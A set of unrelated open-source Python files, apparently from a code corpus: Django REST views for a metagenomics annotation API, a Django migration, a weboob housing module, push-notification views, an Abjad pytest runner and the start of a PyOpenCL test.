""" annotation_model = m_models.KeggOrtholog serializer_class = m_serializers.KeggOrthologSerializer lookup_field = 'accession' lookup_value_regex = 'K[0-9]+' def get_serializer_class(self): return super(KeggOrthologViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of KO Example: --- `/annotations/ko` """ return super(KeggOrthologViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves a Kegg Ortholog Example: --- `/annotations/ko/ko00001` """ return super(KeggOrthologViewSet, self) \ .retrieve(request, *args, **kwargs) class GenomePropViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of Genome Properties. """ annotation_model = m_models.GenomeProperty serializer_class = m_serializers.GenomePropertySerializer lookup_field = 'accession' lookup_value_regex = 'GenProp[0-9]+' def get_serializer_class(self): return super(GenomePropViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of Genome properties Example: --- `/annotations/genome-properties` """ return super(GenomePropViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves a Genome property Example: --- `/annotations/genome-properties/GenProp0063` """ return super(GenomePropViewSet, self) \ .retrieve(request, *args, **kwargs) class AntiSmashGeneClusterViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """Provides list of antiSMASH gene clusters. 
""" annotation_model = m_models.AntiSmashGeneCluster serializer_class = m_serializers.AntiSmashGeneClusterSerializer lookup_field = 'accession' lookup_value_regex = '.*' def get_serializer_class(self): return super().get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of antiSMASH gene clusters Example: --- `/annotations/antismash-gene-clusters` """ return super().list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves an antiSMASH gene cluster Example: --- `/annotations/antismash-gene-clusters/terpene` """ return super().retrieve(request, *args, **kwargs) # FIXME: None of the RelationshipViewSet are working, on Master either... class GoTermAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given GO term Example: --- `/annotations/go-terms/GO:009579/analyses` """ annotation_model = m_models.GoTerm def get_job_ids(self, annotation): job_ids = m_models.AnalysisJobGoTerm.objects \ .filter( M_Q(go_slim__go_term=annotation) | M_Q(go_terms__go_term=annotation) ) \ .distinct('job_id') return job_ids class InterproIdentifierAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given InterPro identifier Example: --- `/annotations/interpro-identifier/IPR020405/analyses` """ annotation_model = m_models.InterproIdentifier def get_job_ids(self, annotation): return m_models.AnalysisJobInterproIdentifier.objects \ .filter(M_Q(interpro_identifiers__interpro_identifier=annotation)) \ .distinct('job_id') class KeggModuleAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given KEGG module M00127 term Example: --- `/annotations/kegg-modules/M00127/analyses` """ annotation_model = m_models.KeggModule def get_job_ids(self, annotation): return m_models.AnalysisJobKeggModule.objects \ .filter(M_Q(kegg_modules__module=annotation)) \ 
.distinct('job_id') class PfamAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given Pfam entey P00001 term Example: --- `/annotations/pfram-entries/P00001/analyses` """ annotation_model = m_models.AnalysisJobPfamAnnotation def get_job_ids(self, annotation): return m_models.AnalysisJobPfam.objects \ .filter(M_Q(pfam_entries__pfam=annotation)) \ .distinct('job_id') class GenomePropertyAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given antiSMASH gene cluster term Example: --- `/annotations/genome-properties/GenProp0017` """ annotation_model = m_models.GenomeProperty def get_job_ids(self, annotation): return m_models.AnalysisJobGenomeProperty.objects \ .filter(M_Q(genome_properties__genome_property=annotation)) \ .distinct('job_id') class AntiSmashGeneClusterAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """Retrieves list of analysis results for the given Genome Property term Example: --- `/annotations/GenProp0063/analyses` """ annotation_model = m_models.AntiSmashGeneCluster def get_job_ids(self, annotation): return m_models.AnalysisJobAntiSmashGeneCluser.objects \ .filter(M_Q(antismash_gene_clusters__gene_cluster=annotation)) \ .distinct('job_id') class KeggOrthologRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given Kegg Ortholog Example: --- `/annotations/kos/ko00001/analyses` """ annotation_model = m_models.KeggOrtholog def get_job_ids(self, annotation): return m_models.AnalysisJobKeggOrtholog.objects \ .filter(M_Q(ko_entries__ko=annotation)) \ .distinct('job_id') class AnalysisGoTermRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves GO terms for the given accession Example: --- `/analyses/MGYA00102827/go-terms` """ serializer_class = m_serializers.GoTermRetriveSerializer pagination_class 
= m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobGoTerm annotation_model_property = 'go_terms' analysis_job_filters = ~Q(experiment_type__experiment_type='amplicon') class AnalysisGoSlimRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves GO slim for the given accession Example: --- `/analyses/MGYA00102827/go-slim` """ serializer_class = m_serializers.GoTermRetriveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobGoTerm annotation_model_property = 'go_slim' analysis_job_filters = ~Q(experiment_type__experiment_type='amplicon') class AnalysisInterproIdentifierRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves InterPro identifiers for the given accession Example: --- `/analyses/MGYA00102827/interpro-identifiers` """ serializer_class = m_serializers.InterproIdentifierRetriveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobInterproIdentifier annotation_model_property = 'interpro_identifiers' analysis_job_filters = ~Q(experiment_type__experiment_type='amplicon') class AnalysisPfamRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves Pfam entries for the given accession Example: --- `/analyses/MGYA00102827/pfam-entries` """ serializer_class = m_serializers.PfamRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobPfam annotation_model_property = 'pfam_entries' class AnalysisKeggModulesRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves KEGG Module for the given accession Example: --- `/analyses/MGYA00102827/kegg-modules` """ serializer_class = 
m_serializers.KeggModuleRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobKeggModule annotation_model_property = 'kegg_modules' class AnalysisKeggOrthologsRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves Kegg Orthologs for the given accession Example: --- /analyses/MGYA00102827/kegg-orthologs """ serializer_class = m_serializers.KeggOrthologRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobKeggOrtholog annotation_model_property = 'ko_entries' class AnalysisGenomePropertiesRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves GenomeProperties for the given accession Example: --- `/analyses/MGYA00102827/genome-properties` """ serializer_class = m_serializers.GenomePropertyRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobGenomeProperty annotation_model_property = 'genome_properties' class AnalysisAntiSmashGeneClustersRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves the antiSMASH gene clusters for the given accession Example: --- `/analyses/MGYA00102827/antismash-gene-clusters` """ serializer_class = m_serializers.AntiSmashGeneClusterRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobAntiSmashGeneCluser annotation_model_property = 'antismash_gene_clusters' class OrganismViewSet(m_viewsets.ListReadOnlyModelViewSet): """ Provides list of Organisms. 
""" serializer_class = m_serializers.OrganismSerializer filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'lineage' lookup_value_regex = '.*' def get_queryset(self): return m_models.Organism.objects.all() def get_serializer_class(self): return super(OrganismViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of Organisms Example: --- `/annotations/organisms` """ return super(OrganismViewSet, self) \ .list(request, *args, **kwargs) class OrganismTreeViewSet(m_viewsets.ListReadOnlyModelViewSet): """ Provides list of Organisms. """ serializer_class = m_serializers.OrganismSerializer filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'domain', 'prefix', 'lineage', ) lookup_field = 'lineage' lookup_value_regex = '[^/]+' def get_queryset(self): lineage = urllib.parse.unquote( self.kwargs.get('lineage', None).strip()) organism = m_models.Organism.objects \ .filter(lineage=lineage) \ .only('name').distinct('name') if len(organism) == 0: raise Http404(("Attribute error '%s'." 
% self.lookup_field)) queryset = m_models.Organism.objects \ .filter(M_Q(ancestors__in=organism) | M_Q(name__in=organism)) return queryset def get_serializer_class(self): return super(OrganismTreeViewSet, self).get_serializer_class() def get_serializer_context(self): context = super(OrganismTreeViewSet, self).get_serializer_context() context['lineage'] = self.kwargs.get('lineage') return context def list(self, request, *args, **kwargs): """ Retrieves list of Organisms Example: --- `/annotations/organisms/Bacteria:Chlorobi/children` """ return super(OrganismTreeViewSet, self) \ .list(request, *args, **kwargs) class AnalysisOrganismRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy def annotation_model_property_resolver(self, analysis): """Get the taxonomic annotations using the following order: - SSU -> version <= 5.0 of pipeline - SSU >= 5.0 of pipeline - ITS OneDB {} - ITS unite - LSU """ alternatives = [ "taxonomy", "taxonomy_ssu", "taxonomy_itsonedb", "taxonomy_unite" "taxonomy_lsu", ] for alt in alternatives: try: return getattr(analysis, alt) except AttributeError: pass return EmbeddedDocumentList([], self.annotation_model, "taxonomy") class AnalysisOrganismSSURelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves SSU Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/ssu` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) 
ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_ssu' class AnalysisOrganismLSURelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves LSU Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/lsu` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_lsu' class AnalysisOrganismITSOneDBRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves ITSoneDB Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/itsonedb` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_itsonedb' class AnalysisOrganismITSUniteRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves ITS UNITE Taxonomic analysis for the given accession Example: --- `/analyses/MGYA00102827/taxonomy/unite` --- """ serializer_class = m_serializers.OrganismRetriveSerializer pagination_class = m_pagination.MaxSetPagination filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'accession' annotation_model = m_models.AnalysisJobTaxonomy annotation_model_property = 'taxonomy_itsunite' class AnalysisTaxonomyOverview(APIView): """Get the counts for each taxonomic 
results for an analysis job. """ def get(self, request, accession): """Get the AnalysisJob and then the AnalysisJobTaxonomy """ job = get_object_or_404( emg_models.AnalysisJob, Q(pk=int(accession.lstrip('MGYA'))) ) analysis = None try: analysis = m_models.AnalysisJobTaxonomy.objects \ .get(analysis_id=str(job.job_id)) except m_models.AnalysisJobTaxonomy.DoesNotExist: raise Http404 return Response({ 'accession': analysis.accession, 'pipeline_version': analysis.pipeline_version, 'taxonomy_count': len(getattr(analysis, 'taxonomy', [])), 'taxonomy_ssu_count': len(getattr(analysis, 'taxonomy_ssu', [])), 'taxonomy_lsu_count': len(getattr(analysis, 'taxonomy_lsu', [])), 'taxonomy_itsunite_count': len(getattr(analysis, 'taxonomy_itsunite', [])), 'taxonomy_itsonedb_count': len(getattr(analysis, 'taxonomy_itsonedb', [])) }) class OrganismAnalysisRelationshipViewSet(m_viewsets.ListReadOnlyModelViewSet): serializer_class = emg_serializers.AnalysisSerializer filter_class = emg_filters.AnalysisJobFilter filter_backends = ( DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter, ) ordering_fields = ( 'job_id', ) ordering = ('-job_id',) search_fields = ( '@sample__metadata__var_val_ucv', ) lookup_field = 'lineage' def get_queryset(self): lineage = urllib.parse.unquote( self.kwargs.get(self.lookup_field, None).strip()) organism = m_models.Organism.objects.filter(lineage=lineage) \ .only('id') if len(organism) == 0: raise NotFound("Lineage not found. 
Lineage: " + lineage) job_ids = m_models.AnalysisJobTaxonomy.objects \ .filter( M_Q(taxonomy__organism__in=organism) | M_Q(taxonomy_lsu__organism__in=organism) | M_Q(taxonomy_ssu__organism__in=organism) ).distinct('job_id') return emg_models.AnalysisJob.objects \ .filter(job_id__in=job_ids) \ .available(self.request) def get_serializer_class(self): return emg_serializers.AnalysisSerializer def list(self, request, *args, **kwargs): """ Retrieves list of analysis results for the given Organism Example: --- `/annotations/organisms/Bacteria:Chlorobi:OPB56/analysis` """ return super(OrganismAnalysisRelationshipViewSet, self) \ .list(request, *args, **kwargs) class AnalysisContigViewSet(viewsets.ReadOnlyModelViewSet): lookup_field = 'contig_id' lookup_value_regex = '[^/]+' filter_backends = ( filters.OrderingFilter, ) ordering = ('id',) serializer_class = m_serializers.AnalysisJobContigSerializer pagination_class = m_pagination.CursorPagination def get_object(self, ): try: pk = int(self.kwargs['accession'].lstrip('MGYA')) except ValueError: raise Http404() query_set = emg_models.AnalysisJob.objects.available(self.request) return get_object_or_404(query_set, Q(pk=pk)) def get_queryset(self): # noqa C901 """Filter the analysis job contigs """ obj = self.get_object() queryset = m_models.AnalysisJobContig.objects request = self.request query_filter = M_Q() # TODO: simplify! 
filter_cog = request.GET.get('cog', '').upper() if filter_cog: query_filter |= M_Q(cogs__cog=filter_cog) filter_kegg = request.GET.get('kegg', '').upper() if filter_kegg: query_filter |= M_Q(keggs__ko=filter_kegg) filter_go = request.GET.get('go', '').upper() if filter_go: query_filter |= M_Q(gos__go_term=filter_go) filter_interpro = request.GET.get('interpro', '').upper() if filter_interpro: query_filter |= M_Q(interpros__interpro_identifier=filter_interpro) filter_pfam = request.GET.get('pfam', '').upper() if filter_pfam: query_filter |= M_Q(pfams__pfam_entry=filter_pfam) filter_antismash = request.GET.get('antismash', '').lower() if filter_antismash: query_filter |= M_Q(as_geneclusters__gene_cluster=filter_antismash) if 'facet[]' in request.GET: facets = request.GET.getlist('facet[]') # TODO: try to simplify this facet_qs = M_Q() if len(facets): for facet in [f for f in facets if getattr(m_models.AnalysisJobContig, 'has_' + f, False)]: facet_qs |= M_Q(**{'has_' + facet: True}) else: # contigs with no annotations for f in m_models.AnalysisJobContig._fields: if f.startswith('has_'): facet_qs &= M_Q(**{f: False}) query_filter &= (facet_qs) len_filter = M_Q() filter_gt = request.GET.get('gt', None) filter_lt = request.GET.get('lt', None) if filter_gt: len_filter &= M_Q(length__gte=filter_gt) if filter_lt: len_filter &= M_Q(length__lte=filter_lt) if len_filter: query_filter &= (len_filter) search = request.GET.get('search', '') if search: query_filter &= M_Q(contig_id__icontains=search) identifier = M_Q(job_id=obj.job_id, pipeline_version=obj.pipeline.release_version) return queryset.filter(identifier & query_filter) def retrieve(self, *args, **kwargs): """Retrieve a contig fasta file. The Fasta file will be retrieved using pysam. 
Example: --- `/analyses/<accession>/contigs/<contig_id>` --- """ obj = self.get_object() contig = self.kwargs['contig_id'] fasta_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, obj.input_file_name + '.fasta.bgz') ) fasta_idx_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, obj.input_file_name + '.fasta.bgz.fai') ) fasta_idx_gzi_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, obj.input_file_name + '.fasta.bgz.gzi') ) if os.path.isfile(fasta_path) and os.path.isfile(fasta_idx_path): output = io.StringIO() # TODO: handle errors with pysam.FastaFile(filename=fasta_path, filepath_index=fasta_idx_path, filepath_index_compressed=fasta_idx_gzi_path) as fasta: rows = fasta.fetch(contig) output.write('>' + emg_utils.assembly_contig_name(contig) + '\n') for row in rows: output.write(row) response = HttpResponse() response['Content-Type'] = 'text/x-fasta' response['Content-Disposition'] = 'attachment; filename={0}.fasta'.format(contig) output.seek(0, os.SEEK_END) response['Content-Length'] = output.tell() response.write(output.getvalue()) return response if settings.DEBUG: return Response('Contig {0} not found.'.format(fasta_path), status.HTTP_404_NOT_FOUND) else: return Response('Contig not found.', status.HTTP_404_NOT_FOUND) @action(detail=True, methods=['get'], url_path='annotations') def retrieve_gff(self, request, *args, **kwargs): """Retrieve a contig GFF file. The are 2 flavors for the GFF files: - COG,KEGG, Pfam, InterPro and EggNOG annotations - antiSMASH By default the action will return the 'main one', unless specified using the querystring param 'antismash=True' The GFF file will be parsed with pysam and sliced. 
Example: --- /analyses/<accession>/<contig_id>/annotation --- """ obj = self.get_object() contig = self.kwargs['contig_id'] file_prefix = 'annotations' folder = 'functional-annotation' if self.request.GET.get('antismash', False): file_prefix = 'antismash' folder = 'pathways-systems' gff_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, folder, '{}.{}.gff.bgz'.format(obj.input_file_name, file_prefix)) ) gff_idx_path = os.path.abspath(os.path.join( settings.RESULTS_DIR, obj.result_directory, folder, '{}.{}.gff.bgz.tbi'.format(obj.input_file_name, file_prefix)) ) if os.path.isfile(gff_path) and os.path.isfile(gff_idx_path): # multiple_iterators = True as many processes # could be using the same file at the same moment output = io.StringIO() try: with pysam.TabixFile(filename=gff_path, index=gff_idx_path) as gff: rows = gff.fetch(contig, multiple_iterators=True) for row in rows: output.write(emg_utils.assembly_contig_name(row) + '\n') response = HttpResponse() response['Content-Type'] = 'text/x-gff3' response['Content-Disposition'] = 'attachment; filename={0}.gff'.format(contig) output.seek(0, os.SEEK_END) response['Content-Length'] = output.tell() response.write(output.getvalue()) return response except ValueError: return Response('Contig not found on GFF file.', status.HTTP_404_NOT_FOUND) if settings.DEBUG: return Response('No GFF file for contig {0}.'.format(contig), status.HTTP_404_NOT_FOUND) else: return Response('No GFF file for contig.', status.HTTP_404_NOT_FOUND)
apache-2.0
vaaceves/repue-repositorio-universidad-empresa
home/migrations/0007_auto_20170201_1439.py
1
1649
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2017-02-01 20:39 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('home', '0006_auto_20170131_1404'), ] operations = [ migrations.RenameField( model_name='autor', old_name='pais', new_name='paisResidencia', ), migrations.AddField( model_name='articulo', name='issuu', field=models.TextField(default='blank', max_length=100), ), migrations.AddField( model_name='autor', name='tematicas', field=models.ManyToManyField(to='home.Tematica'), ), migrations.RemoveField( model_name='articulo', name='pais', ), migrations.AddField( model_name='articulo', name='pais', field=models.ManyToManyField(to='home.Pais'), ), migrations.AlterField( model_name='articulo', name='titulo', field=models.CharField(max_length=150), ), migrations.AlterField( model_name='autor', name='institucion', field=models.CharField(max_length=100), ), migrations.AlterField( model_name='autor', name='puesto', field=models.CharField(max_length=150), ), migrations.AlterField( model_name='pais', name='pais', field=models.CharField(max_length=15), ), ]
unlicense
willprice/weboob
modules/explorimmo/module.py
7
2527
# -*- coding: utf-8 -*-

# Copyright(C) 2014      Bezleputh
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.

from weboob.tools.backend import Module
from weboob.capabilities.housing import CapHousing, Housing, HousingPhoto

from .browser import ExplorimmoBrowser


__all__ = ['ExplorimmoModule']


class ExplorimmoModule(Module, CapHousing):
    """Weboob backend implementing CapHousing for the explorimmo website."""

    NAME = 'explorimmo'
    DESCRIPTION = u'explorimmo website'
    MAINTAINER = u'Bezleputh'
    EMAIL = 'carton_ben@yahoo.fr'
    LICENSE = 'AGPLv3+'
    VERSION = '1.1'

    BROWSER = ExplorimmoBrowser

    def get_housing(self, housing):
        """Fetch full details (including phone) for a housing.

        Accepts either a ``Housing`` object to fill in place or a bare
        housing identifier string.
        """
        if isinstance(housing, Housing):
            housing_id = housing.id
        else:
            housing_id, housing = housing, None
        housing = self.browser.get_housing(housing_id, housing)
        housing.phone = self.browser.get_phone(housing_id)
        return housing

    def search_city(self, pattern):
        """Return cities whose name matches ``pattern``."""
        return self.browser.get_cities(pattern)

    def search_housings(self, query):
        """Run a housing search for the cities belonging to this backend.

        Returns an empty list when none of the query's cities are ours.
        """
        cities = ['%s' % c.id for c in query.cities if c.backend == self.name]
        if not cities:
            return []
        return self.browser.search_housings(
            query.type, cities, query.nb_rooms,
            query.area_min, query.area_max,
            query.cost_min, query.cost_max,
            query.house_types)

    def fill_housing(self, housing, fields):
        """Complete a partially-populated Housing object."""
        self.browser.get_housing(housing.id, housing)
        if 'phone' in fields:
            housing.phone = self.browser.get_phone(housing.id)
        return housing

    def fill_photo(self, photo, fields):
        """Download photo data lazily, only when requested and missing."""
        if 'data' in fields and photo.url and not photo.data:
            photo.data = self.browser.open(photo.url).content
        return photo

    # Maps capability objects to their fill callbacks (weboob convention).
    OBJECTS = {
        Housing: fill_housing,
        HousingPhoto: fill_photo,
    }
agpl-3.0
null-none/django-api-push
apps/apps/views.py
2
3056
# FIX: HttpResponseRedirect was used by PushAllView without being imported
# (NameError at request time); Python-2-only ``except Exception, e`` syntax
# replaced with ``as e``; the ``mimetype`` kwarg (removed in Django 1.7)
# replaced with ``content_type``.
from django.http import HttpResponse, HttpResponseRedirect
from push_notifications.models import APNSDevice, GCMDevice
from rest_framework.views import APIView

import json

from .models import *
from .serializers import *


class AddIosDeviceView(APIView):
    """
    Add iOS device.

    device -- Device parameter (format string)
    """

    def post(self, request, format=None):
        if request.POST.get('device', None):
            # Register the APNS token only once.
            device = APNSDevice.objects.filter(
                registration_id=request.POST['device'])
            if not device:
                APNSDevice.objects.create(
                    registration_id=request.POST['device'])
            result = {"result": "ok"}
        else:
            result = {"result": "error", 'type': 'invalid format device'}
        return HttpResponse(json.dumps(result),
                            content_type='application/json')


class AddAndroidDeviceView(APIView):
    """
    Add Android device.

    device -- Device parameter (format text)
    """

    def post(self, request, format=None):
        if request.POST.get('device', None):
            # Register the GCM token only once.
            device = GCMDevice.objects.filter(
                registration_id=request.POST['device'])
            if not device:
                GCMDevice.objects.create(
                    registration_id=str(request.POST['device']))
            result = {"result": "ok"}
        else:
            result = {"result": "error", 'type': 'invalid format device'}
        return HttpResponse(json.dumps(result),
                            content_type='application/json')


class PushAndroidView(APIView):
    """
    Push notification on device android
    """

    def get(self, request, format=None):
        for item in GCMDevice.objects.filter(active=True):
            try:
                item.send_message("Please update app")
            except Exception as e:
                # Abort on the first failing device, reporting the error.
                result = {"result": str(e)}
                return HttpResponse(json.dumps(result),
                                    content_type='application/json')
        result = {"result": "ok"}
        return HttpResponse(json.dumps(result),
                            content_type='application/json')


class PushIosView(APIView):
    """
    Push notification on device iOS
    """

    def get(self, request, format=None):
        for item in APNSDevice.objects.filter(active=True):
            try:
                item.send_message("Please update app")
            except Exception as e:
                # Abort on the first failing device, reporting the error.
                result = {"result": str(e)}
                return HttpResponse(json.dumps(result),
                                    content_type='application/json')
        result = {"result": "ok"}
        return HttpResponse(json.dumps(result),
                            content_type='application/json')


class PushAllView(APIView):
    """
    Push notification on all active device
    """

    def get(self, request, format=None):
        # Best-effort broadcast: deliberately ignore per-device failures.
        for item in APNSDevice.objects.filter(active=True):
            try:
                item.send_message("Please update app")
            except Exception:
                pass
        for item in GCMDevice.objects.filter(active=True):
            try:
                item.send_message("Please update app")
            except Exception:
                pass
        return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))
mit
mscuthbert/abjad
abjad/tools/developerscripttools/PyTestScript.py
2
3817
# -*- encoding: utf-8 -*-
import argparse
import multiprocessing
import os
from abjad.tools import systemtools
from abjad.tools.developerscripttools.DirectoryScript import DirectoryScript


class PyTestScript(DirectoryScript):
    r'''Runs pytest on various Abjad paths.

    ..  shell::

        ajv test --help

    '''

    ### PUBLIC PROPERTIES ###

    @property
    def alias(self):
        r'''Alias of script.

        Returns ``'test'``.
        '''
        return 'test'

    @property
    def long_description(self):
        r'''Long description of script.

        Returns string or none.
        '''
        return None

    @property
    def scripting_group(self):
        r'''Scripting group of script.

        Returns none.
        '''
        return None

    @property
    def short_description(self):
        r'''Short description of script.

        Returns string.
        '''
        return 'Run "pytest" on various Abjad paths.'

    @property
    def version(self):
        r'''Version of script.

        Returns float.
        '''
        return 1.0

    ### PUBLIC METHODS ###

    def process_args(self, args):
        r'''Processes `args`.

        Builds a pytest command line from the parsed arguments and
        delegates to ``pytest.main``, returning its exit status.

        Returns none.
        '''
        import pytest
        # Each flag contributes its fragment only when requested.
        parallel = (
            '-n {}'.format(multiprocessing.cpu_count())
            if args.parallel else '')
        exitfirst = '-x' if args.exitfirst else ''
        report = '-r {}'.format(args.report) if args.report else ''
        print('TESTING:')
        for path in args.path:
            print('\t{}'.format(path))
        print('')
        path = ' '.join(args.path)
        command = '{} {} {} {}'.format(parallel, exitfirst, report, path)
        # split() collapses the empty fragments left by unused flags.
        return pytest.main(command.split())

    def setup_argument_parser(self, parser):
        r'''Sets up argument `parser`.

        Registers the pytest pass-through flags plus a mutually exclusive
        group selecting which directory tree to test.

        Returns none.
        '''
        from abjad import abjad_configuration
        parser.add_argument('-p', '--parallel',
            action='store_true',
            dest='parallel',
            help='run pytest with multiprocessing',
            )
        parser.add_argument('-r', '--report',
            action='store',
            dest='report',
            help='show extra test summary info as specified by chars ' + \
                '(f)ailed, (E)error, (s)skipped, (x)failed, (X)passed.',
            metavar='chars',
            )
        parser.add_argument('-x', '--exitfirst',
            action='store_true',
            dest='exitfirst',
            help='stop on first failure',
            )
        # Exactly one target tree may be chosen; default covers mainline
        # tools plus the experimental directory.
        group = parser.add_mutually_exclusive_group()
        group.add_argument('-A', '--all',
            action='store_const',
            const=[abjad_configuration.abjad_root_directory],
            dest='path',
            help='test all directories, including demos',
            )
        group.add_argument('-D', '--demos',
            action='store_const',
            const=[os.path.join(
                abjad_configuration.abjad_directory, 'demos')],
            dest='path',
            help='test demos directory',
            )
        group.add_argument('-M', '--mainline',
            action='store_const',
            const=[os.path.join(
                abjad_configuration.abjad_directory, 'tools')],
            dest='path',
            help='test mainline tools directory',
            )
        group.add_argument('-X', '--experimental',
            action='store_const',
            const=[abjad_configuration.abjad_experimental_directory],
            dest='path',
            help='test experimental directory',
            )
        parser.set_defaults(path=[
            os.path.join(abjad_configuration.abjad_directory, 'tools'),
            abjad_configuration.abjad_experimental_directory
            ])
gpl-3.0
hughperkins/pub-prototyping
pyopencl/testpointers.py
1
1246
# Smoke test for OpenCL pointer handling across address spaces
# (constant / global / private) in struct members.
import time
import numpy as np
import pyopencl as cl

# Index of the GPU to use, counted across all platforms.
gpu_idx = 0

platforms = cl.get_platforms()
ctx = None
i = 0
for platform in platforms:
    gpu_devices = platform.get_devices(device_type=cl.device_type.GPU)
    if gpu_idx < i + len(gpu_devices):
        ctx = cl.Context(devices=[gpu_devices[gpu_idx - i]])
        break
    i += len(gpu_devices)
# FIX: previously a system without a matching GPU fell through the loop and
# hit a confusing NameError on the first use of ``ctx``; fail fast instead.
if ctx is None:
    raise RuntimeError(
        'no GPU device found for gpu_idx=%d across %d platform(s)'
        % (gpu_idx, len(platforms)))
print('context', ctx)

q = cl.CommandQueue(ctx)
mf = cl.mem_flags

source = """
